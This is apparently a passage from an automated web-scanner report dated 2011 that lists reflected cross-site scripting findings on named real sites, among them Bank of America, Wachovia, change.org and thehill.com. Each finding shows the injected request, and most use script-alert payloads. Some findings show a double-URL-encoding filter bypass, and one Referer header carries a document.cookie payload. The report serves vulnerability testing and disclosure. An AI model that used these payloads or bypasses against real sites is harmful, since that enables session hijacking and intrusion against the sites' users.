Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNLQwN7SuBVwwVhEGaw%2C%2C; expires=Fri, 03-Feb-2012 00:11:13 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30663

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1' />
...[SNIP]...

2.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /resources/official.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e492'><a>093e292e14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /resources/official.html?2e492'><a>093e292e14d=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f58e59b2d0925781bc9226b17dda3b43; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32784

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?2e492'><a>093e292e14d=1' />
...[SNIP]...

2.54. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29 was submitted in the REST URL parameter 2. This input was echoed as 3cf50"><script>alert(1)</script>89c53a9cf29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /japan-news/16713cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cj9PCk000000iW6rcNrdSziWggn6yemmaw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:09 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/16713cf50"><script>alert(1)</script>89c53a9cf29/tuna-costs-254-000-in-japan/&title=Chinese%20New%20Year%20boosts%20Japan%20tourism">
...[SNIP]...

2.55. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c was submitted in the REST URL parameter 3. This input was echoed as c2d11"><script>alert(1)</script>3dcc286b11c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /japan-news/1671/tuna-costs-254-000-in-japanc2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039cn9Q4p0000004Xg2fUaiviCivWQ_RWXE4w--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:03:12 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japanc2d11"><script>alert(1)</script>3dcc286b11c/&title=Tuna%20costs%20%A3254%2C000%20in%20Japan">
...[SNIP]...

2.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.change.org
Path:   /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf2b</script><script>alert(1)</script>36bc7e08caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1 HTTP/1.1
Host: news.change.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.10
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
ETag: "b50aa88426653a094f386591a7682307"
X-Runtime: 771
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: change_session_id=c5b8d93b80d9ed64f7c66ce96c5d235f; domain=.change.org; path=/; HttpOnly
Content-Length: 22463
Server: nginx/0.6.35 + Phusion Passenger 2.2.10 (mod_rails/mod_rack)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7]> <html class="no-js ie6" lang="en-US" xml:lang="en-US" xmlns=
...[SNIP]...
st","RAILS_ENV":"production","action":"show","page_name":"news-show-27728","controller":"stories"};
_gaq = [["_trackPageview","/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1"]];
//]]>
...[SNIP]...

2.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e508d"-alert(1)-"e0d6dc517b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/English/In_Activation.asp?e508d"-alert(1)-"e0d6dc517b3=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NBDJILIAKMMGBBIBOJIMHFBD; secure; path=/
Date: Wed, 02 Feb 2011 21:59:58 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "e508d"-alert(1)-"e0d6dc517b3=1";
   
if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else

...[SNIP]...

2.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a68'-alert(1)-'bbae7f15828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Pages/English/In_Activation.asp?73a68'-alert(1)-'bbae7f15828=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33448
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=BCDJILIAFFAGBBIDFABDKBNE; secure; path=/
Date: Wed, 02 Feb 2011 21:59:59 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
                           var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?73a68'-alert(1)-'bbae7f15828=1';
                           strHref = strHref.toLowerCase()
                           if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 )
                           {
                           v
...[SNIP]...

2.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6508"><a>a5002a02ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/In_Activation.asp?e6508"><a>a5002a02ed4=1 HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33648
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=NADJILIAAEJKGBMFKCCKAKFC; secure; path=/
Date: Wed, 02 Feb 2011 21:59:54 GMT
Connection: close


   <script type="text/javascript">
       alert ("Special Characters are not allowed.");
       location.href = "http://www.bankofamerica.com";
   </script>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?e6508"><a>a5002a02ed4=1">
...[SNIP]...

2.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c128"><script>alert(1)</script>0f891e45ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do?9c128"><script>alert(1)</script>0f891e45ab3=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 22:02:36 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...
<TextArea name="9c128"><script>alert(1)</script>0f891e45ab3" style="display:none;visibility:hide">
...[SNIP]...

2.61. http://search.wareseeker.com/ip-board/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b75"><script>alert(1)</script>47d05c4592a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ip-boardc8b75"><script>alert(1)</script>47d05c4592a/ HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=4rtpcdn9ep0nfp5tqbhmaq6ve1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...
<a title="ip boardc8b75 script alert 1 script 47d05c4592a Free Download - windows software" href="http://download.wareseeker.com/ip-boardc8b75"><script>alert(1)</script>47d05c4592a/" class="selected allsoftware">
...[SNIP]...

2.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wareseeker.com
Path:   /ip-board/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad93e"><script>alert(1)</script>125f5dcb899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1 HTTP/1.1
Host: search.wareseeker.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:24:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=v5k6266f8pht791v1r546ej5o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type
...[SNIP]...
<a rel="nofollow" href="http://search.wareseeker.com/ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1p-2/">
...[SNIP]...

2.63. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/WareSeekercom/ROS/tags.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a25e7<a>ea4068e9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/WareSeekercoma25e7<a>ea4068e9f94/ROS/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Thu, 03 Feb 2011 01:33:43 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Thu, 03 Feb 2011 02:33:43 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11790

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "wareseekercoma25e7<a>ea4068e9f94";
t.adSpace = "ros";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/dis
...[SNIP]...

2.64. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tags.expo9.exponential.com
Path:   /tags/WareSeekercom/ROS/tags.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 66ae8<a>a5a81e35302 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tags/WareSeekercom/ROS66ae8<a>a5a81e35302/tags.js HTTP/1.1
Host: tags.expo9.exponential.com
Proxy-Connection: keep-alive
Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 151
X-Reuse-Index: 1
Date: Thu, 03 Feb 2011 01:34:05 GMT
Last-Modified: Mon, 17 Jan 2011 07:16:23 GMT
Expires: Thu, 03 Feb 2011 02:34:05 GMT
Cache-Control: max-age=3600, private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 11790

if (expo9_pageId == undefined) {
var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000);
var expo9_adNum = 0;
}
var e9;
var e9TKey;
expo9_ad = (function() {

var version = "1.20";
var displayAdVersion = "0.3";

function expo9_ad() {
var t = this;
t.host = "a.tribalfusion.com";
t.site = "wareseekercom";
t.adSpace = "ros66ae8<a>a5a81e35302";
t.tagKey = "1282868635";
t.tKey = e9TKey;
t.pageId = expo9_pageId;
t.center = 1;
t.flashVer = 0;
t.tagHash = makeTagHash();
t.displayAdURL = "http://"+t.host+"/displayAd.js?dver=" + di
...[SNIP]...

2.65. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650aa'><script>alert(1)</script>2295b33377e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=en4idpn2cplbg96q3m2b2f49c7; path=/
Connection: close
Content-Length: 73997

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire650aa'><script>alert(1)</script>2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more#comments'>
...[SNIP]...

2.66. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f52a1'><script>alert(1)</script>1f00b24b3b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 02:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 02:15:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=2tr8nhs6ici1dq18j4impjn8o0; path=/
Connection: close
Content-Length: 76050

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4#comments'>
...[SNIP]...

2.67. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 was submitted in the REST URL parameter 4. This input was echoed as 84351'><img src=a onerror=alert(1)>b4355392092 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=4tgmbjdtk4fojqqj58b8p4hiq3; path=/
Connection: close
Content-Length: 74000

